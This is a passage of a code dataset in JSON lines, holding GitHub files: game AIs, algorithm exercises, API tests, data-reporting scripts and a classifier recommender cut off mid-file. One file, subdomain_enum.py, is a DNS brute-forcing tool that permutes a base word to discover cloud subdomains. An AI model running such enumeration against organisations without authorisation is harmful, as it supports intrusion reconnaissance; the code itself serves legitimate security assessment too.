mock_print.assert_called_with(\"\\x1b[92mYou WON \\x1b[0m\\n\")\n\n def test_board(self):\n board = (\n \"+-------+-------+-------+\\n\"\n \"| 1 | 5 | 3 |\\n\"\n \"| 3 7 | 1 | 4 |\\n\"\n \"| | 2 | |\\n\"\n \"+-------+-------+-------+\\n\"\n \"| | 9 4 | |\\n\"\n \"| 4 | | 3 2 |\\n\"\n \"| | 3 2 5 | |\\n\"\n \"+-------+-------+-------+\\n\"\n \"| | | 2 |\\n\"\n \"| 7 4 | | |\\n\"\n \"| 8 | 3 | 1 |\\n\"\n \"+-------+-------+-------+\\n\"\n )\n self.assertEqual(board, self.sudoku.__str__())\n\n\nif __name__ == \"__main__\": # pragma: no cover\n unittest.main()\n","repo_name":"MatiasBoldrini/Sudoku","sub_path":"test_sudoku.py","file_name":"test_sudoku.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10160003851","text":"import sys\n\n# Max hop distance\nX = 3\n\nstonesCost = [0, 20, 30, 40, 25, 15, 20, 28]\ntotalCost = 0\n\n'''\nI want to look at one-ahead, two-ahead, and three-ahead and choose the minimum of these three.\n'''\ni = 0\ncurrStone = 0\ncostMin = 9999\ncostMindex = 0\noptions = [0] * X\nwhile i < len(stonesCost) - 1:\n if (len(stonesCost) - i) <= X:\n options = [0] * (len(stonesCost) - i - 1)\n valTest = len(stonesCost) - i\n for x in range(0, len(stonesCost) - i - 1):\n options[x] = stonesCost[i + x + 1]\n else:\n for x in range(0, X):\n options[x] = stonesCost[i + x + 1]\n localMax = 9999\n for x in range(0, len(options)):\n if options[x] < localMax:\n localMax = options[x]\n costMindex = i + x + 1\n i = costMindex\n currStone = localMax\n totalCost = totalCost + localMax\n\nprint(totalCost)\n\n\ndef min_cost_dp(C, X):\n N = len(C)\n dp = [sys.maxsize for _ in range(0, N)]\n dp[0] = 0\n for k in range(0, N):\n for j in range(1, min(X, k) + 1):\n dp[k] = min(dp[k], dp[k - j] + C[k])\n return dp[N - 1]\n\n\nprint(min_cost_dp(stonesCost, X))\n","repo_name":"hippi345/algorithms","sub_path":"python/dynamic_programming/hoppingStonesCost.py","file_name":"hoppingStonesCost.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37714015653","text":"from random import randint\nfrom BaseAI import BaseAI\nimport time\nimport random \nimport math\n'''\nNeil Kumar (nk2739)\nAI Homework 2\n3/20/18\n'''\n\nclass PlayerAI(BaseAI):\n\n\t'''\n\tReturns the optimal move for the maximizing agent.\n\t'''\n\tdef getMove(self, grid):\n\n\t\tmoves = grid.getAvailableMoves()\n\t\toptimalMove = -1\n\n\t\t# Allots each move a fraction of the total move time \n\t\ttimeLimit = 0.2 / float(len(moves))\n\t\toptimalMoveVal = -1*float(\"inf\")\n\n\t\t# Goes through the available moves and runs minimax on each\n\t\tfor move in moves:\n\n\t\t\tgridCopy = grid.clone()\n\t\t\tgridCopy.move(move)\n\n\t\t\t# Makes sure each move runs within a specific time limit \n\t\t\tinitTime = time.clock()\n\t\t\tcurTime = initTime\n\t\t\talpha = -1*float(\"inf\")\n\t\t\tbeta = float(\"inf\")\n\t\t\tdepth_limit = 3\n\n\t\t\t(state,score) = self.maximize(gridCopy,alpha,beta,depth_limit,initTime,curTime,timeLimit)\n\n\t\t\t# Selects the max-scored move amongst all moves \n\t\t\tif score > optimalMoveVal:\n\t\t\t\toptimalMoveVal = score\n\t\t\t\toptimalMove = move\n\n\t\treturn optimalMove\n\n\t'''\n\tEvaluates a board based on a number of heuristics \n\t'''\n\tdef evaluateGrid(self,grid):\n\t\tnumAvailableCells = len(grid.getAvailableCells()) \n\t\tsmoothness = self.calcSmoothness(grid) \n\t\tmonotonicity = self.calcMonotonicity(grid) \n\t\ttotalGridValue = self.getGridTotalValue(grid)\n\t\tmaxTileValue = grid.getMaxTile()\n\t\tdistanceToMaxValue = self.getDistanceToMax(grid)\n\t\taverageTileValue = self.getGridAverageTileValue(grid)\n\n\t\tnormSmoothness = float(math.log(smoothness)/math.log(2))\n\t\tnormNumAvailable = math.log(numAvailableCells)/math.log(2) if numAvailableCells != 0 else 0\n\t\t\n\t\tavailableCellWeight = 13.5\n\t\tmonotonicityWeight = 5\n\t\tsmoothnessWeight = 6\n\t\tmaxTileWeight = 1.5\n\t\tdistanceToMaxValueWeight = 25\n\t\taverageTileValueWeight = 0.00002\n\n\t\treturn (availableCellWeight*normNumAvailable + maxTileWeight*maxTileValue) \\\n\t\t- (monotonicityWeight*monotonicity + smoothnessWeight*normSmoothness + distanceToMaxValueWeight*distanceToMaxValue)\n\n\t'''\n\tThe 'Maximize' function used in Expectiminimax.\n\tUsed to maximize the player's score.\n\t'''\n\tdef maximize(self,grid,alpha,beta,depth,initTime,curTime,timeLimit):\n\t\t\n\t\tmoves = grid.getAvailableMoves()\n\t\tmaxChild = None\n\t\tmaxUtil = -1*float('inf')\n\n\t\t# Terminal Test - done when no more moves, depth limit reached, or time is up\n\t\tif (len(moves) == 0 or depth == 0 or time.clock() - initTime >= timeLimit):\n\t\t\treturn (maxChild, self.evaluateGrid(grid))\n\n\t\t# Runs through each \"child\" or state where the next move is played\n\t\tfor move in moves:\n\t\t\tgridCopy = grid.clone()\n\t\t\tgridCopy.move(move)\n\n\t\t\t# Runs minimize from maximize\n\t\t\tnewTime = time.clock()\n\t\t\t(newChild,newUtil) = self.minimize(gridCopy,alpha,beta,depth,initTime,newTime,timeLimit)\n\n\t\t\tif newUtil > maxUtil:\n\t\t\t\tmaxChild = gridCopy\n\t\t\t\tmaxUtil = newUtil\n\n\t\t\t# Prunes if necessary \n\t\t\tif maxUtil >= beta:\n\t\t\t\tbreak\n\n\t\t\tif maxUtil > alpha:\n\t\t\t\talpha = maxUtil\n\n\t\treturn (maxChild,maxUtil)\n\n\t'''\n\tThe 'Minimize' function used in Expectiminimax. \n\tUsed to minimize the player's score. \n\t'''\n\tdef minimize(self,grid,alpha,beta,depth,initTime,curTime,timeLimit):\n\t\t\n\t\topenCells = grid.getAvailableCells()\n\t\tminChild = None\n\t\tminUtil = float('inf')\n\n\t\t# Terminal Test - done when no free tiles, depth limit is reached, or time is up \n\t\tif (len(openCells) == 0 or depth == 0 or time.clock() - initTime >= timeLimit):\n\t\t\treturn (minChild, self.evaluateGrid(grid))\n\n\t\t# Goes through each \"child\" or way to place a 2 or 4 tile\n\t\tfor cell in openCells:\n\t\t\n\t\t\t# Gets a probability in the range [0,1)\n\t\t\tp = random.random() \n\n\t\t\t# Chooses a tile to insert \n\t\t\ttoInsert = 4 if p >= 0.9 else 2 \n\n\t\t\tgridCopy = grid.clone()\n\t\t\tgridCopy.insertTile(cell,toInsert)\n\n\t\t\t# Runs maximize\n\t\t\tnewTime = time.clock()\n\t\t\t(newChild,newUtil) = self.maximize(gridCopy,alpha,beta,depth-1,initTime,newTime,timeLimit)\n\n\t\t\tif newUtil < minUtil:\n\t\t\t\tminChild = gridCopy\n\t\t\t\tminUtil = newUtil\n\n\t\t\t# Prunes if necessary \n\t\t\tif minUtil <= alpha:\n\t\t\t\tbreak\n\n\t\t\tif minUtil < beta:\n\t\t\t\tbeta = minUtil\n\n\t\treturn (minChild,minUtil)\n\n\t'''\n\tReturns the distance from the max element to the nearest corner.\n\tAims to keep the max element near the corners.\n\t'''\n\tdef getDistanceToMax(self,grid):\n\t\tmaxTileValue = grid.getMaxTile()\n\t\tminDistance = float(\"inf\")\n\n\t\tcorners = [(0,0),(0,grid.size-1),(grid.size-1,0),(grid.size-1,grid.size-1)]\n\n\t\tfor x in xrange(grid.size):\n\t\t\tfor y in xrange(grid.size):\n\n\t\t\t\tif (grid.map[x][y]==maxTileValue):\n\n\t\t\t\t\tfor corner in corners:\n\t\t\t\t\t\tdist = abs(corner[0]-x) + abs(corner[1]-y)\n\n\t\t\t\t\t\t# Returns the smallest distance to the nearest corner\n\t\t\t\t\t\tif dist < minDistance:\n\t\t\t\t\t\t\tminDistance = dist\n\n\t\t# Returns the distance of the max tile to the nearest corner \n\t\treturn minDistance\n\n\t'''\n\tCalculates the 'Monotonicity' of the grid or the number of times values\n\tchange between neighbors regarding growth in size. \n\t'''\n\tdef calcMonotonicity(self,grid):\n\n\t\ttotalMisplaced = 0\n\t\trow1 = [(0,0),(0,1),(0,2),(0,3)]\n\t\trow2 = [(1,0),(1,1),(1,2),(1,3)]\n\t\trow3 = [(2,0),(2,1),(2,2),(2,3)]\n\t\trow4 = [(3,0),(3,1),(3,2),(3,3)]\n\t\trows = [row1,row2,row3,row4]\n\n\t\t# Calculates the number of changes in the Left/Right direction\n\t\tfor row in rows:\n\t\t\ttotalMisplaced += self.checkNumMisplaced(row,grid,True)\n\n\t\t# Calculates the number of changes in the Up/Down direction.\n\t\tcol1 = [(0,0),(1,0),(2,0),(3,0)]\n\t\tcol2 = [(0,1),(1,1),(2,1),(3,1)]\n\t\tcol3 = [(0,2),(1,2),(2,2),(3,2)]\n\t\tcol4 = [(0,3),(1,3),(2,3),(3,3)]\n\n\t\tcols = [col1,col2,col3,col4]\n\n\t\tfor col in cols:\n\t\t\ttotalMisplaced += self.checkNumMisplaced(col,grid,False)\n\n\t\t# Returns the total number of times values vary\n\t\treturn totalMisplaced\n\n\t'''\n\tUsed to calculate monotonicity. For each direction calculates the number of times\n\tthe values don't consistently grow or shrink.\n\t'''\n\tdef checkNumMisplaced(self,vals,grid,leftRight):\n\n\t\tnumMisplaced = 0\n\n\t\tfor i in xrange(len(vals)):\n\t\t\tcurVal = grid.map[vals[i][0]][vals[i][1]]\n\n\t\t\tif not (curVal == 0):\n\n\t\t\t\tif i+1 < grid.size:\n\t\t\t\t\tnextVal = grid.map[vals[i+1][0]][vals[i+1][1]]\n\n\t\t\t\t\t# For each value sees if its neighbor is correctly smaller or larger\n\t\t\t\t\tif not (nextVal == 0):\n\n\t\t\t\t\t\t# Increases going right in the Left/Right direction\n\t\t\t\t\t\tif leftRight:\n\n\t\t\t\t\t\t\tif nextVal < curVal:\n\t\t\t\t\t\t\t\tnumMisplaced += 1\n\n\t\t\t\t\t\t# Decreases going down in the Up/Down direction\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\tif nextVal > curVal:\n\t\t\t\t\t\t\t\tnumMisplaced += 1\n\n\t\t# Returns the number of inconsistencies for that specific direction\n\t\treturn numMisplaced\n\n\t'''\n\tCalculates the 'Smoothness' or difference between adjacent cells.\n\t'''\n\tdef calcSmoothness(self,grid):\n\n\t\ttotalVal = 0\n\n\t\tfor x in xrange(grid.size):\n\t\t\tfor y in xrange(grid.size):\n\t\t\t\tcurVal = grid.map[x][y]\n\n\t\t\t\t# Only cares about non-zero values\n\t\t\t\tif (curVal > 0):\n\n\t\t\t\t\t# Looks at the value of each of its neighbors \n\t\t\t\t\tneighbors = [(x+1,y),(x-1,y),(x,y+1),(x,y-1)]\n\n\t\t\t\t\tfor neighbor in neighbors:\n\t\t\t\t\t\tif not grid.crossBound(neighbor):\n\n\t\t\t\t\t\t\t# Only cares about non-zero neighbors as well\n\t\t\t\t\t\t\tif (neighbor > 0):\n\n\t\t\t\t\t\t\t\tdiff = abs(curVal-grid.map[neighbor[0]][neighbor[1]])\n\t\t\t\t\t\t\t\ttotalVal += diff\n\n\t\t# Returns the total differences for each node combined \n\t\treturn totalVal\n\n\t'''\n\tCalculates the total of all the grid cell values.\n\t'''\n\tdef getGridTotalValue(self,grid):\n\t\ttotal = 0\n\t\t\n\t\tfor x in xrange(grid.size):\n\t\t\tfor y in xrange(grid.size):\n\t\t\t\ttotal += grid.map[x][y]\n\n\t\t# Returns the total for all grid cells \n\t\treturn total\n\n\t'''\n\tReturns the average tile value by getting the total and dividing by the # of cells.\n\t'''\n\tdef getGridAverageTileValue(self,grid):\n\n\t\treturn float(self.getGridTotalValue(grid))/float(pow((grid.size),2))","repo_name":"nk2739/Portfolio","sub_path":"AI_HW2/PlayerAI.py","file_name":"PlayerAI.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10011306030","text":"\"\"\"\nRewrite spec/functional_specs/policies/batcher/batcher_policy_append_spec.rb\n\"\"\"\nfrom time import sleep\nimport pytest\nfrom testsuite import rawobj\n\n\nBATCH_REPORT_SECONDS = 50\n\n\n@pytest.fixture(scope=\"module\")\ndef policy_settings():\n \"\"\"Set policy settings\"\"\"\n return rawobj.PolicyConfig(\"3scale_batcher\", {\"batch_report_seconds\": BATCH_REPORT_SECONDS})\n\n\ndef test_batcher_policy_append(api_client, application):\n \"\"\"Test if return correct number of usages of a service in batch\"\"\"\n client = api_client()\n analytics = application.threescale_client.analytics\n usage_before = analytics.list_by_service(application[\"service_id\"], metric_name=\"hits\")[\"total\"]\n\n for _ in range(5):\n client.get(\"/get\")\n\n usage_after = analytics.list_by_service(application[\"service_id\"], metric_name=\"hits\")[\"total\"]\n assert usage_after == usage_before\n\n # BATCH_REPORT_SECONDS needs to be big enough to execute all the requests to apicast + assert on analytics\n sleep(BATCH_REPORT_SECONDS + 1)\n\n usage_after = analytics.list_by_service(application[\"service_id\"], metric_name=\"hits\")[\"total\"]\n assert usage_after == usage_before + 5\n","repo_name":"mijaros/3scale-tests","sub_path":"testsuite/tests/apicast/policy/batcher/test_batcher_policy_append.py","file_name":"test_batcher_policy_append.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"39827750310","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import sin,sqrt\n\nseno = lambda w : sin(w*np.linspace(0,2*np.pi,1000))\n\nsenos = np.array([seno(w) for w in range(64)])\nN = len(senos)\namplitudes = np.array([1]*N)/sqrt(N)\n\nfor it in range(1,int(sqrt(N))):\n \n \n senos = np.array([amplitudes[i]*senos[i] for i in range(N)])\n \n plt.figure(figsize=(12,10))\n plt.plot(np.linspace(0,2*np.pi,1000),senos.sum(axis = 0))\n plt.show()\n\n amplitudes = np.array([1]*(3) + [2*it*sqrt(N)] + [1]*(N - 4) )\n norm_factor = 1/((amplitudes**2).sum())\n\n amplitudes = norm_factor*amplitudes\n \n","repo_name":"Raafm/algorithm_visualization","sub_path":"Grover_aux.py","file_name":"Grover_aux.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17474603430","text":"from typing import Dict, List, Tuple, Union\n\n# Sample code taken from aima-python\n\nclass BayesNode:\n def __init__(self, X: str, parents: List[str], cpt: Dict[Union[tuple, str], float]):\n if isinstance(parents, str):\n parents = parents.split()\n if(isinstance(list(cpt.keys())[0], str)):\n cpt = { (k,): v for (k, v) in cpt.items() }\n self.variable: str = X\n self.parents: List[str] = parents\n self.cpt: Dict[tuple, float] = cpt\n self.values: List[str] = list(set([k[0] for k in cpt.keys()]))\n\n\nclass BayesNet:\n def __init__(self, node_specs: List[Tuple[str, str, Dict[Union[tuple, str], float]]]):\n self.nodes: list[BayesNode] = []\n self.variables: list[str] = []\n node_specs = node_specs or []\n for node_spec in node_specs:\n node = BayesNode(*node_spec)\n self.nodes.append(node)\n self.variables.append(node.variable)","repo_name":"desi-ivanov/bayesian-networks-parser","sub_path":"BNetwork.py","file_name":"BNetwork.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"49818238073","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import date\nfrom datetime import timedelta\nimport requests\nimport json\nimport pandas as pd\nimport gspread_dataframe as gd\n\nclass Rasa_Test:\n\n # initialize gspread details & RASA API\n def __init__(self):\n self.scope = ['https://www.googleapis.com/auth/drive']\n self.creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', self.scope)\n self.client = gspread.authorize(self.creds)\n self.url = 'http://localhost:5005/webhooks/rest/webhook'\n\n # Fetch Worksheet Object\n def call_sheet(self,sheet_name,worksheet_name):\n self.sheet = self.client.open(sheet_name).worksheet(worksheet_name)\n return self.sheet\n\n # Fetch required data(Questions) from that Sheet & return with Column_List\n def fetch_data(self, google_sheet, todays_date):\n print(\"data fetching from existing sheet.....\")\n list_of_records = google_sheet.get_all_records()\n Question_list = []\n email_id_list = []\n Name_list = []\n intent_list = []\n for records in list_of_records:\n if records.get('Date') == todays_date:\n question = records.get('question')\n email_id = records.get('email_id')\n name = records.get('name')\n Question_list.append(question)\n email_id_list.append(email_id)\n Name_list.append(name)\n intent_list.append(\"\")\n print(\"data fetched from existing sheet successfully..!\")\n return Question_list, email_id_list, Name_list, intent_list\n\n # Pass question list to RASA api & get Response\n def call_rasa_api(self,question_list):\n Response_list = []\n try:\n print(\"Pass questions list to API.....\")\n print(self.url)\n for ques in question_list:\n payload = {\"sender\": \"mee\", \"message\": ques}\n r = requests.post(self.url, data=json.dumps(payload))\n response_return = r.json()\n Response_list.append(response_return[0].get(\"text\"))\n print(\"response of rasa for each question has done successfully..!\")\n return Response_list\n except:\n print(\"Rasa API connection issue...!\")\n\n # Save & Append output into Google sheet\n def save_output_into_sheet(self,worksheet,df_list):\n existing_df = gd.get_as_dataframe(worksheet)\n #print(\"Existing DF\"+ existing_df)\n try:\n print(\"Output of rasa appending to the new sheet...!\")\n for row in df_list:\n worksheet.append_row(row)\n print(\"Output response of Rasa has been appended to new sheet successfully..!\")\n return True\n except:\n print(\"something went wrong while updating google sheet..!\")\n\nrasa_obj = Rasa_Test()\nsheet = rasa_obj.call_sheet(\"Chatbot_Daily_Report\",\"Chatbot_Daily_Report\")\ntoday = date.today()\nyesterday = today - timedelta(days=1)\nyesterday = yesterday.strftime('%b %d, %Y')\nprint(yesterday)\n# yesterday = \"Sep 01, 2020\"\nquestion_list, email_id, Name, intent_list = rasa_obj.fetch_data(sheet,yesterday)\n# email_id = [item for item in sheet.col_values(3) if item]\n# Name = [item for item in sheet.col_values(4) if item]\ntry:\n if len(question_list) != 0:\n Response_list = rasa_obj.call_rasa_api(question_list)\n d = {'Date':yesterday,'Email':email_id,'Questions': question_list,'Rasa_intent':intent_list,'Rasa_output': Response_list}\n Rasa_dataframe = pd.DataFrame(d)\n # print(Rasa_dataframe)\n df_list_value = Rasa_dataframe.values.tolist()\n created_sheet = rasa_obj.call_sheet(\"Chatbot_Daily_Report\",\"BL_BOT_Compare\")\n output = rasa_obj.save_output_into_sheet(created_sheet,df_list_value)\n if output == True:\n print(\"Added today's data successfully...!!!\")\n else:\n print(\"Something Issue at Rasa API backend\")\nexcept:\n print(\"No interaction happened in today's date.\")\n\n","repo_name":"santoshikalaskar/chatbot_report_generation_google_App_script","sub_path":"fetch_google_sheet_questions_apply_rasa_api_save_back_output.py","file_name":"fetch_google_sheet_questions_apply_rasa_api_save_back_output.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10462082786","text":"import time\nfrom paramiko import SSHClient\nfrom scp import SCPClient\nfrom loguru import logger\n\n\n# Instantiating SSH client\nwith SSHClient() as ssh:\n ssh.load_system_host_keys()\n ssh.connect(\"l1\", username=\"twkim\")\n # Transfer directory to the remote_path\n with SCPClient(ssh.get_transport()) as scp:\n logger.info(\"SCP Transfer starts...\")\n execution_begin = time.time()\n scp.put(\n r\"P:\\IRB_STUDY00146630_RheSolve\\Data\\ImageData\\DCM_20220216-16_GALA_TK\\127-06-015_20220216\\DEID\",\n recursive=True,\n remote_path=\"/home/twkim/test\",\n )\n execution_end = time.time()\n execution_interval = execution_end - execution_begin\n logger.info(f\"SCP Transfer finished! Total time: {execution_interval}s\")\n","repo_name":"rlaxodnjs199/kumc-ImageProcessing","sub_path":"Util/l1_scp.py","file_name":"l1_scp.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70831054763","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Cretaing the Pixel array \n\nfrom PIL import Image\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nimport os\npath = '/Volumes/MY_PASSPORT/JRF/cancer_genome/gopal_gen_copy/png_files'\n\nimage_list = []\nfor entry in os.listdir():\n if entry.endswith('.png'):\n image_list.append(entry)\n\nprint(image_list)\ndef get_concat_h_multi_resize(im_list, resample=Image.BICUBIC):\n max_height = max(im.height for im in im_list)\n #print(max_height)\n im_list_resize = [im.resize((int(im.width * max_height / im.height), max_height),resample=resample) for im in im_list]\n #print(im_list)\n #im_list_resize = im_list\n total_width = sum(im.width for im in im_list_resize)\n #print(total_width)\n dst = Image.new('RGB', (total_width, max_height))\n pos_x = 0\n for im in im_list_resize:\n dst.paste(im, (pos_x, 0))\n pos_x += im.width\n return dst\n\ndef get_concat_v_multi_resize(im_list, resample=Image.BICUBIC):\n max_width = max(im.width for im in im_list)\n #im_list_resize = [im.resize((min_width, int(im.height * max_width / im.width)),resample=resample) for im in im_list]\n im_list_resize = im_list\n total_height = sum(im.height for im in im_list_resize)\n dst = Image.new('RGB', (max_width, total_height))\n pos_y = 0\n for im in im_list_resize:\n dst.paste(im, (0, pos_y))\n pos_y += im.height\n return dst\n\ndef get_concat_tile_resize(im_list_2d, resample=Image.BICUBIC):\n im_list_v = [get_concat_h_multi_resize(im_list_h, resample=resample) for im_list_h in im_list_2d]\n return get_concat_v_multi_resize(im_list_v, resample=resample)\n\nim = [Image.open(x) for x in image_list]\n\nfor entry in os.listdir(path):\n if entry.endswith('.png'):\n get_concat_tile_resize([[im[0], im[1]],\n [im[2], im[3],im[4]],\n [im[5]],\n [im[6], im[7]],\n [im[8], im[9]], \n [im[10],im[11]],\n [im[12]],\n [im[13]],\n [im[14], im[15]],\n [im[16]]\n ]).save('pillow_concat_tile_resize.tiff')\n\n","repo_name":"gnsrivastava/image_project","sub_path":"grid_script.py","file_name":"grid_script.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34038235556","text":"\n\nimport argparse\nimport dns.resolver\n\nDNS_SERVERS = ['8.8.8.8', '9.9.9.9', '4.2.2.1']\n\n# ANSI codes for some pretty terminal output\nclass bcolors:\n OK = '\\033[92m' # GREEN\n WARNING = '\\033[93m' # YELLOW\n FAIL = '\\033[91m' # RED\n RESET = '\\033[0m' # RESET COLOR\n\ndomains_exist = []\n\ndef permute(base, domain, permutations):\n names_to_try = []\n for item in permutations:\n names_to_try.append(f\"{item}{base}.{domain}\")\n names_to_try.append(f\"{base}{item}.{domain}\")\n names_to_try.append(f\"{item}.{base}.{domain}\")\n names_to_try.append(f\"{base}.{item}.{domain}\")\n names_to_try.append(f\"{item}-{base}.{domain}\")\n names_to_try.append(f\"{base}-{item}.{domain}\")\n return names_to_try\n \n\ndef resolve(name):\n global domains_exist\n resolver = dns.resolver.Resolver(configure=False)\n resolver.nameservers = DNS_SERVERS\n try:\n answer = resolver.resolve(name, 'A')\n print(f\"{bcolors.OK}{name}{bcolors.RESET} exists\")\n # We don't care what the IP is, just that the name exists\n domains_exist.append(name)\n except dns.resolver.NoAnswer as e:\n # This exception means there's some kind of record, but no IP was returned\n print(f\"Exists but no IP for {bcolors.WARNING}{name}{bcolors.RESET}\")\n domains_exist.append(name)\n except Exception as e:\n pass\n\n\ndef main():\n\n parser = argparse.ArgumentParser(\n description='Enumerate Azure Cloud resources')\n parser.add_argument('--base', help='Base word')\n parser.add_argument('--permutations', default='permutations.txt',\n help='File containing permutations')\n parser.add_argument('--domains', default='domains.txt',\n help='File containing domains')\n parser.add_argument('--outfile', help='Output file')\n\n args = parser.parse_args()\n base = args.base\n permutations_file = args.permutations\n domains_file = args.domains\n outfile = args.outfile\n\n with open(permutations_file) as f:\n permutations = f.read().splitlines()\n\n with open(domains_file) as f:\n domains = f.read().splitlines()\n\n for domain in domains:\n print(f\"Enumerating {domain}...\")\n candidates = permute(base, domain, permutations)\n candidates.append(f\"{base}.{domain}\")\n for candidate in candidates:\n resolve(candidate)\n\n with open(outfile, \"w\") as f:\n for domain in domains_exist:\n f.write(f\"{domain}\\n\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"swtornio/subdomain_enum","sub_path":"subdomain_enum.py","file_name":"subdomain_enum.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70956026284","text":"from typing import List, Dict\n\nfrom scipy import sparse\nfrom sklearn import neighbors\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom orange_cb_recsys.content_analyzer.content_representation.content import Content\n\nimport pandas as pd\n\nfrom orange_cb_recsys.recsys.algorithm import RankingAlgorithm\nfrom orange_cb_recsys.utils.const import logger\nfrom orange_cb_recsys.utils.load_content import get_rated_items, get_unrated_items, load_content_instance\n\n\nclass ClassifierRecommender(RankingAlgorithm):\n \"\"\"\n Class that implements a logistic regression classifier.\n\n Args:\n item_field (str): Name of the field that contains the content to use\n field_representation (str): Id of the field_representation content\n classifier(str): classifier that will be used\n can be one of the following values:\n random_forest, svm, log_regr,\n knn, decision_tree, gaussian_process\n threshold: ratings bigger than threshold will be\n considered as positive\n _fields_representations (Dict): same of field_representation (str), but here\n there is a Dict, where the key is the name field and the values are the representations of the field.\n _item_fields (List): same of item_field, but here there is a list of more fields\n classifier_parameters (Dict) = a Dict the describe the parameters for the type of classifier used\n \"\"\"\n def __init__(self, item_field: str = None, field_representation: str = None, classifier: str = None, threshold=-1,\n _item_fields: List = None, _fields_representations: Dict = None, classifier_parameters: Dict = None):\n super().__init__(item_field, field_representation)\n self.__classifier: str = classifier\n self.__threshold = threshold\n self.__item_fields = _item_fields\n self.__field_representations = _fields_representations\n self.__classifier_parameters = classifier_parameters\n # aggiungi opzioni\n\n def predict(self, user_id: str, ratings: pd.DataFrame, recs_number: int, items_directory: str, candidate_item_id_list: List = None) -> pd.DataFrame:\n \"\"\"\n 1) Goes into items_directory and for each item takes the values corresponding to the field_representation of\n the item_field. For example, if item_field == \"Plot\" and field_representation == \"tf-idf\", the function will\n take the \"tf-idf\" representation of each \"Plot\" field for every rated item, the tf-idf representation of rated items\n and items to classify will be parsed to dense arrays;\n 2) Define target features, items with rating greater (lower) than threshold will be used as positive(negative) examples;\n 3) Creates an object Classifier, uses the method fit and predicts the class of the new items\n\n Args:\n candidate_item_id_list: list of the items that can be recommended, if None\n all unrated items will be used\n user_id: user for which recommendations will be computed\n recs_number (list[Content]): How long the ranking will be\n ratings (pd.DataFrame): ratings of the user with id equal to user_id\n items_directory (str): Name of the directory where the items are stored.\n\n Returns:\n The predicted classes, or the predict values.\n \"\"\"\n\n if candidate_item_id_list is None:\n unrated_items = get_unrated_items(items_directory, ratings)\n else:\n unrated_items = [load_content_instance(items_directory, item_id) for item_id in candidate_item_id_list]\n\n rated_features_bag_list = []\n unrated_features_bag_list = []\n\n logger.info(\"Retrieving rated items\")\n rated_items = get_rated_items(items_directory, ratings)\n if self.__threshold == -1:\n threshold = pd.to_numeric(ratings[\"score\"], downcast=\"float\").mean()\n else:\n threshold = self.__threshold\n\n labels = []\n if self.__item_fields is None:\n for item in rated_items:\n if item is not None:\n rated_features_bag_list.append(item.get_field(self.item_field).get_representation(self.item_field_representation).value)\n labels.append(1 if float(ratings[ratings['to_id'] == item.content_id].score) >= threshold else 0)\n else:\n for item in rated_items:\n if item is not None:\n for item_field in self.__item_fields:\n if item_field in self.__field_representations.keys():\n __field_representations = self.__field_representations[item_field]\n for field_representation in __field_representations:\n rated_features_bag_list.append(\n item.get_field(item_field).get_representation(field_representation).value)\n labels.append(\n 1 if float(ratings[\n ratings['to_id'] == item.content_id].score) >= threshold else 0)\n\n logger.info(\"Labeling examples\")\n if self.__item_fields is None:\n for item in unrated_items:\n if item is not None:\n unrated_features_bag_list.append(item.get_field(self.item_field).get_representation(self.item_field_representation).value)\n else:\n for item in unrated_items:\n if item is not None:\n for item_field in self.__item_fields:\n if item_field in self.__field_representations.keys():\n __field_representations = self.__field_representations[item_field]\n for field_representation in __field_representations:\n unrated_features_bag_list.append(\n item.get_field(item_field).get_representation(field_representation).value)\n\n clf = None\n if self.__classifier.lower() == \"random_forest\":\n if self.__classifier_parameters is not None:\n clf = RandomForestClassifier(**self.__classifier_parameters)\n else:\n clf = RandomForestClassifier(n_estimators=400, random_state=42)\n\n elif self.__classifier.lower() == \"svm\":\n if self.__classifier_parameters is not None:\n clf = CalibratedClassifierCV(LinearSVC(**self.__classifier_parameters))\n else:\n clf = CalibratedClassifierCV(LinearSVC(random_state=42))\n\n elif self.__classifier.lower() == \"log_regr\":\n if self.__classifier_parameters is not None:\n clf = LogisticRegression(**self.__classifier_parameters)\n else:\n clf = LogisticRegression(random_state=42)\n\n elif self.__classifier.lower() == \"knn\":\n if self.__classifier_parameters is not None:\n clf = neighbors.KNeighborsClassifier()\n else:\n clf = neighbors.KNeighborsClassifier()\n\n elif self.__classifier.lower() == \"decision_tree\":\n if self.__classifier_parameters is not None:\n clf = DecisionTreeClassifier(**self.__classifier_parameters)\n else:\n clf = 